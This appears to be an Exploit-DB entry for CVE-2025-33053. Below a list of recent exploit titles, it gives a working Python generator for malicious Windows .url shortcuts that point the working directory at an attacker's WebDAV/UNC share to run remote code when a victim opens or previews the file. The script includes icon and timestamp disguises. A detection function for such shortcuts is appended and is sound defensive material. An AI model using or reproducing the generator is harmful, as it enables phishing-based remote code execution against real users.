
15 changes to exploits/shellcodes/ghdb

AirKeyboard iOS App 1.0.5 - Remote Input Injection
Parrot and DJI variants Drone OSes - Kernel Panic Exploit
Skyvern 0.1.85 - Remote Code Execution (RCE) via SSTI
Anchor CMS 0.12.7 - Stored Cross Site Scripting (XSS)
Litespeed Cache WordPress Plugin 6.3.0.1 - Privilege Escalation
PHP CGI Module 8.3.4 - Remote Code Execution (RCE)
Microsoft Excel Use After Free - Local Code Execution
PCMan FTP Server 2.0.7 - Buffer Overflow
PCMan FTP Server 2.0.7 - Remote Buffer Overflow
WebDAV Windows 10 - Remote Code Execution (RCE)
Windows 11 SMB Client - Privilege Escalation & Remote Code Execution (RCE)
62 lines
No EOL
2.2 KiB
Text
Exploit Title: WebDAV Windows 10 - Remote Code Execution (RCE)
Date: June 2025
Author: Dev Bui Hieu
Tested on: Windows 10, Windows 11
Platform: Windows
Type: Remote
CVE: CVE-2025-33053

Description:
This exploit leverages the behavior of Windows .URL files to execute a
remote binary over a UNC path. When a victim opens or previews the .URL
file (e.g. from email), the system may automatically reach out to the
specified path (e.g. WebDAV or SMB share), leading to arbitrary code
execution without prompt.

```bash
python3 gen_url.py --ip 192.168.1.100 --out doc.url
```

```python
import argparse

def generate_url_file(output_file, url_target, working_directory, icon_file, icon_index, modified):
    content = f"""[InternetShortcut]
URL={url_target}
WorkingDirectory={working_directory}
ShowCommand=7
IconIndex={icon_index}
IconFile={icon_file}
Modified={modified}
"""
    with open(output_file, "w", encoding="utf-8") as f:
        f.write(content)
    print(f"[+] .url file created: {output_file}")

def main():
    parser = argparse.ArgumentParser(description="Generate a malicious .url file (UNC/WebDAV shortcut)")

    parser.add_argument('--out', default="bait.url", help="Output .url file name")
    parser.add_argument('--ip', required=True, help="Attacker IP address or domain name for UNC/WebDAV path")
    parser.add_argument('--share', default="webdav", help="Shared folder name (default: webdav)")
    parser.add_argument('--exe', default=r"C:\Program Files\Internet Explorer\iediagcmd.exe",
                        help="Target executable path on victim machine")
    parser.add_argument('--icon', default=r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
                        help="Icon file path")
    parser.add_argument('--index', type=int, default=13, help="Icon index (default: 13)")
    parser.add_argument('--modified', default="20F06BA06D07BD014D", help="Fake Modified timestamp (hex string)")

    args = parser.parse_args()

    working_directory = fr"\\{args.ip}\{args.share}\\"

    generate_url_file(
        output_file=args.out,
        url_target=args.exe,
        working_directory=working_directory,
        icon_file=args.icon,
        icon_index=args.index,
        modified=args.modified
    )

if __name__ == "__main__":
    main()
```
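
A defender-side check for the shortcut layout the generator above writes, as an added example that is not part of the original exploit entry: it parses the text of a `.url` file and flags a `URL` naming a local executable combined with a `WorkingDirectory` on a UNC or other remote path. The function names, finding labels and both sample shortcuts (using the documentation address 192.0.2.10) are constructed for illustration.

```python
import configparser
import re

# Remote locations: UNC (\\host\share, including WebDAV forms such as \\host@SSL\share)
# or a URL scheme followed by a host name.
REMOTE_PATH = re.compile(r"^(?:\\\\[^\\]+\\|(?:https?|file)://[^/])", re.IGNORECASE)
# A drive-letter path (optionally written as file:///) ending in an executable extension.
LOCAL_EXE = re.compile(r"^(?:file:///)?[a-z]:[\\/].*\.(?:exe|com|scr)$", re.IGNORECASE)

def parse_shortcut(text):
    """Return the [InternetShortcut] keys of a .url file as a dict with lower-cased names."""
    cp = configparser.RawConfigParser(strict=False, delimiters=("=",))
    try:
        cp.read_string(text.lstrip("\ufeff"))  # tolerate a leading BOM
    except configparser.Error:
        return {}  # not a parseable shortcut
    for section in cp.sections():
        if section.lower() == "internetshortcut":
            return dict(cp.items(section))
    return {}

def assess(text):
    """Return a list of finding labels (hypothetical names) for one .url file's text."""
    keys = parse_shortcut(text)
    findings = []
    if REMOTE_PATH.match(keys.get("workingdirectory", "")):
        findings.append("remote-working-directory")
        if LOCAL_EXE.match(keys.get("url", "")):
            findings.append("local-exe-with-remote-working-directory")
    # ShowCommand=7 (start minimized) is only a supporting signal, never a finding alone.
    if findings and keys.get("showcommand") == "7":
        findings.append("minimized-window")
    return findings

# Constructed sample matching the generator's layout (192.0.2.10 is a documentation address).
SUSPICIOUS = r"""[InternetShortcut]
URL=C:\Program Files\Internet Explorer\iediagcmd.exe
WorkingDirectory=\\192.0.2.10\webdav\\
ShowCommand=7
IconIndex=13
IconFile=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"""
# Constructed sample of an ordinary web shortcut.
BENIGN = "[InternetShortcut]\nURL=https://example.com/docs\nIconIndex=0\n"

if __name__ == "__main__":
    print(assess(SUSPICIOUS))
    print(assess(BENIGN))
```

Real `.url` files may be ANSI or UTF-16 encoded, so decode attachments accordingly before passing their text to `assess`.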